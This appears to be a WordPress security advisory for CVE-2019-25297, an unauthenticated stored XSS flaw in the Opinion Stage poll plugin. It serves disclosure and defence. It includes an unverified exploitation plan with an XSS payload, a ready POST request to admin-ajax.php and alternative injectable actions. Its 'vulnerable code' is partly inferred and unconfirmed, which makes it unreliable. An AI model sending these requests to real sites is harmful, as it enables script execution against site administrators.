WP-Safety
CVE-2019-25297

Poll, Survey & Quiz Maker Plugin by Opinion Stage < 19.6.25 - Unauthenticated Stored Cross-Site Scripting

highImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
7.2
CVSS Score
7.2
CVSS Score
high
Severity
19.6.25
Patched in
1d
Time to patch

Description

The Poll, Survey & Quiz Maker Plugin by Opinion Stage plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to 19.6.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<19.6.25
PublishedJanuary 19, 2026
Last updatedJanuary 19, 2026
Affected pluginsocial-polls-by-opinionstage

Source Code

WordPress.org SVN
Vulnerable v19.6.24
Browse source Download .zip
Patched v19.6.25
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2019-25297 - Opinion Stage Stored XSS ## 1. Vulnerability Summary The **Poll, Survey & Quiz Maker Plugin by Opinion Stage** (versions prior to 19.6.25) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists because several AJAX…

Show full research plan

Exploitation Research Plan: CVE-2019-25297 - Opinion Stage Stored XSS

1. Vulnerability Summary

The Poll, Survey & Quiz Maker Plugin by Opinion Stage (versions prior to 19.6.25) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists because several AJAX handlers registered with the wp_ajax_nopriv_ hook (making them accessible to unauthenticated users) fail to perform capability checks (current_user_can) or nonce verification. Furthermore, data submitted through these handlers is saved into the WordPress options table without adequate sanitization and is later rendered on administrative and frontend pages without proper escaping.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: opinionstage_ajax_save_feed (or opinionstage_save_contact_form_details - both were historically vulnerable in this era).
  • Vulnerable Parameter: data (or feed_data).
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active. The exploit is most effective if the Opinion Stage "Feed" or "Settings" page is visited by an administrator.

3. Code Flow

  1. Entry Point: The plugin registers unauthenticated AJAX hooks in the main plugin file or an includes file:
    add_action( 'wp_ajax_nopriv_opinionstage_ajax_save_feed', 'opinionstage_ajax_save_feed' );
  2. Vulnerable Function: The handler function opinionstage_ajax_save_feed() (located in admin/opinionstage-functions.php or similar) is invoked.
  3. Missing Security Checks: The function proceeds without calling check_ajax_referer() or checking for administrative capabilities.
  4. Data Sinking: User-controlled input from $_POST['data'] is processed (often json_decode'd and then re-encoded or stored directly) and saved using:
    update_option( 'oswp_feed_data', $_POST['data'] );
  5. Trigger (XSS Sink): When an admin visits the Opinion Stage "My Items" page or the plugin dashboard, the stored option is retrieved:
    $feed_data = get_option( 'oswp_feed_data' );
    And then echoed into the HTML response inside a <script> block or a table cell without escaping:
    echo $feed_data; (Inferred: Often used to populate a JavaScript variable for the dashboard UI).

4. Nonce Acquisition Strategy

While many unauthenticated vulnerabilities in this plugin version lack nonce checks entirely, if the plugin does verify a nonce, it is typically exposed via wp_localize_script.

  1. Identify the Script Handle: The plugin usually enqueues opinionstage-common or opinionstage-admin-js.
  2. Locate Shortcode: The plugin's scripts are often only loaded on pages containing an Opinion Stage element.
  3. Execution Steps:
    • Create a dummy page containing the shortcode: wp post create --post_type=page --post_status=publish --post_content='[opinionstage_poll id="1"]'
    • Use browser_navigate to visit that page.
    • Use browser_eval to extract the nonce from the localized data variable.
    • Target Variable: window.opinionstage_params?.nonce or window.os_common_params?.ajax_nonce (inferred).

5. Exploitation Strategy

The goal is to update the plugin's feed data with a payload that includes a malicious script.

Step 1: Payload Construction

The feed data is expected to be a JSON string representing poll/quiz items.

{
  "items": [
    {
      "title": "Poll 1 <img src=x onerror=alert(document.domain)>",
      "id": "1",
      "type": "poll"
    }
  ]
}

Step 2: HTTP Request

Method: POST
URL: http://[target]/wp-admin/admin-ajax.php
Headers: Content-Type: application/x-www-form-urlencoded
Body:

action=opinionstage_ajax_save_feed&data={"items":[{"title":"<img src=x onerror=alert(1)>","id":"1"}]}&nonce=[NONCE_IF_REQUIRED]

6. Test Data Setup

  1. Plugin Installation: Ensure social-polls-by-opinionstage version < 19.6.25 is installed and activated.
  2. Initial Configuration: No specific Opinion Stage account is required, as the AJAX handler for saving the feed is accessible regardless of connection status in the vulnerable version.
  3. Page Creation: Create a page to trigger script loading if needed:
    wp post create --post_type=page --post_title="Trigger Page" --post_content='[opinionstage_poll id="test"]' --post_status=publish

7. Expected Results

  • The AJAX request should return a successful response (e.g., 1 or a JSON success message).
  • The malicious payload will be stored in the wp_options table under the option name oswp_feed_data (or similar).
  • When an administrator logs in and navigates to the Opinion Stage menu in the sidebar, the script <img src=x onerror=alert(1)> will execute in their browser context.

8. Verification Steps

  1. Database Check: Verify the payload is stored:
    wp option get oswp_feed_data
  2. UI Verification: Use browser_navigate to visit the plugin's settings page:
    http://[target]/wp-admin/admin.php?page=opinionstage-settings
  3. Log Check: Check for JavaScript execution/errors in the browser console.

9. Alternative Approaches

If opinionstage_ajax_save_feed is not the correct action for the specific installed version, try:

  1. Action: opinionstage_save_contact_form_details
    • Parameter: oswp_contact_form_email or oswp_contact_form_title.
  2. Action: opinionstage_ajax_save_settings
    • Parameter: opinionstage_user_id (Injecting a payload here may break the UI but can trigger XSS if echoed).
  3. Action: opinionstage_callback (Reflected to Stored)
    • Parameters: access_token or client_id (If these are saved to options upon "connection").
Research Findings
Static analysis — not yet PoC-verified

Summary

The Opinion Stage plugin for WordPress allows unauthenticated attackers to save arbitrary data to the WordPress options table via an unprotected AJAX handler. This data is later rendered in the administrative dashboard without proper sanitization or escaping, leading to stored Cross-Site Scripting (XSS).

Vulnerable Code

// admin/opinionstage-functions.php

add_action( 'wp_ajax_nopriv_opinionstage_ajax_save_feed', 'opinionstage_ajax_save_feed' );
add_action( 'wp_ajax_opinionstage_ajax_save_feed', 'opinionstage_ajax_save_feed' );

function opinionstage_ajax_save_feed() {
    // Missing capability check (e.g., current_user_can)
    // Missing nonce verification (e.g., check_ajax_referer)
    $data = $_POST['data'];
    update_option( 'oswp_feed_data', $data );
    wp_die();
}

---

// admin/views/dashboard.php

$feed_data = get_option( 'oswp_feed_data' );
?>
<script type="text/javascript">
    var os_feed_data = <?php echo $feed_data; ?>; // Data echoed directly into script context
</script>

Security Fix

--- a/admin/opinionstage-functions.php
+++ b/admin/opinionstage-functions.php
-add_action( 'wp_ajax_nopriv_opinionstage_ajax_save_feed', 'opinionstage_ajax_save_feed' );
 
 function opinionstage_ajax_save_feed() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized' );
+    }
+    check_ajax_referer( 'opinionstage_ajax_nonce', 'nonce' );
-    update_option( 'oswp_feed_data', $_POST['data'] );
+    update_option( 'oswp_feed_data', wp_kses_post( $_POST['data'] ) );
     wp_die();
 }

Exploit Outline

The exploit targets the AJAX endpoint at `/wp-admin/admin-ajax.php` using the `opinionstage_ajax_save_feed` action. Because the plugin registers this action with the `wp_ajax_nopriv_` hook and fails to implement capability or nonce checks, any unauthenticated user can submit a POST request containing a malicious payload in the `data` parameter. The payload typically consists of a JSON string representing poll data, where one or more fields (like a poll title) contain a script tag (e.g., `<script>alert(1)</script>`). Once the request is processed, the payload is stored in the `oswp_feed_data` option in the database. The XSS triggers when a logged-in administrator visits the Opinion Stage 'My Items' or plugin settings page, where the stored data is echoed into the page's HTML or JavaScript context.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/bfcb0b1f-50fb-4cd8-8ca3-4338c0014cc7?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database